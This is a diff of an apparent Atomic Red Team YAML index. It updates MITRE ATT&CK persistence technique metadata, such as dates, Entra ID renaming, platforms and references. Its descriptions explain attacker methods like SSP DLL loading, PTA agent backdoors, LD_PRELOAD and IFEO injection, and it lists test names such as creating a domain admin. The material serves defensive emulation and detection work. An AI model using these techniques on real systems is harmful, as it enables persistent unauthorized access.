         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -62420,8 +62846,6 @@ persistence:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests:
     - name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
@@ -62465,30 +62889,30 @@ persistence:
         elevation_required: true
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -62496,9 +62920,9 @@ persistence:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -62507,21 +62931,22 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -62561,13 +62986,10 @@ persistence:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -62644,7 +63066,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests:
     - name: Launch Daemon
@@ -62730,7 +63151,7 @@ persistence:
           sudo rm /tmp/T1543_004_atomicredteam.txt
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -62749,6 +63170,7 @@ persistence:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -62756,7 +63178,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -62776,29 +63197,31 @@ persistence:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests:
     - name: powerShell Persistence via hijacking default modules - Get-Variable.exe
@@ -62891,7 +63314,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1505.003
     atomic_tests:
     - name: Web Shell Written to Disk
@@ -62935,7 +63357,7 @@ persistence:
         name: command_prompt
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -62950,6 +63372,7 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -62958,18 +63381,18 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -63001,9 +63424,6 @@ persistence:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin privileges
@@ -63153,7 +63573,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests:
     - name: Create a new time provider
@@ -63232,7 +63651,7 @@ persistence:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -63258,8 +63677,6 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests:
     - name: Trap EXIT
@@ -63350,7 +63767,7 @@ persistence:
         name: sh
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -63471,7 +63888,6 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests:
     - name: Shared Library Injection via /etc/ld.so.preload
@@ -63659,7 +64075,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.001
     atomic_tests:
     - name: Create a user account on a Linux system
@@ -63935,7 +64350,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests:
     - name: Winlogon Shell Key Persistence - PowerShell
@@ -64168,7 +64582,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests:
     - name: Modify SSH Authorized Keys
@@ -64241,7 +64654,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -64274,8 +64687,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests:
     - name: IFEO Add Debugger
@@ -64402,7 +64813,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -64437,12 +64848,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -64519,7 +64928,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests:
     - name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -64706,7 +65114,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests:
     - name: Create a new Windows domain admin user
@@ -64938,7 +65345,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -64968,55 +65375,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -65047,6 +65409,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -65056,9 +65419,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -65066,11 +65433,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests:
     - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via
@@ -65198,7 +65601,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -65246,8 +65649,6 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests:
     - name: Create registry persistence via AppCert DLL
@@ -65292,7 +65693,7 @@ persistence:
         elevation_required: true
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -65305,16 +65706,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -65326,16 +65727,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -65390,7 +65791,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -65451,7 +65851,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -65527,7 +65926,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -65555,8 +65954,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests:
     - name: Persistence by modifying Windows Terminal profile
@@ -65655,7 +66052,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -65680,23 +66077,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
